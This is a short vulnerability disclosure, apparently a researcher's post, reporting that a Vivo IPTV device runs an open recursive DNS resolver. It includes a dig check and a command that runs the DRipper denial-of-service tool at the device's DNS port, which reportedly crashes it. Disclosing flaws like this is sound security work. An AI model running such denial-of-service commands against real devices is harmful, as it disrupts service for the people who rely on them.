A recursive DNS lookup occurs when a DNS server communicates with several other DNS servers to look up an IP address and return it to the client.
Allowing recursive DNS queries against open DNS servers creates a security vulnerability as this configuration could allow attackers to perform DNS amplification attacks.
While we analyzed and recognized the device’s technologies, we identified that it uses the recursive method in DNS, which enables denial of service attacks.
IPTV Device Tested:
Firmware Tested: 2023.04.04.01.06.15
The IP 192.168.15.250 that will be shown throughout the article is the IP of Vivo’s IPTV physical device.
Identified the enabled recursive method:
dig google.com A @192.168.15.250
Used Exploit:
PoC:
Accessing some functionality of the device (Netflix, for example):
Carrying out the attack:
python3 DRipper.py -s 192.168.15.250 -t 135 -p 53
System down after performing the attack:
Impact:
In the amplification technique, the attacker sends a spoofed request that asks for a very long response. The server will receive a barrage of long and unwanted DNS responses that can interrupt or even crash the IPTV device.
References:
https://www.cloudflare.com/pt-br/learning/dns/what-is-recursive-dns/
https://www.cloudflare.com/pt-br/learning/ddos/dns-amplification-ddos-attack/
https://www.cert.br/docs/whitepapers/dns-recursivo-aberto/
My LinkedIn: https://www.linkedin.com/in/lucas-fp/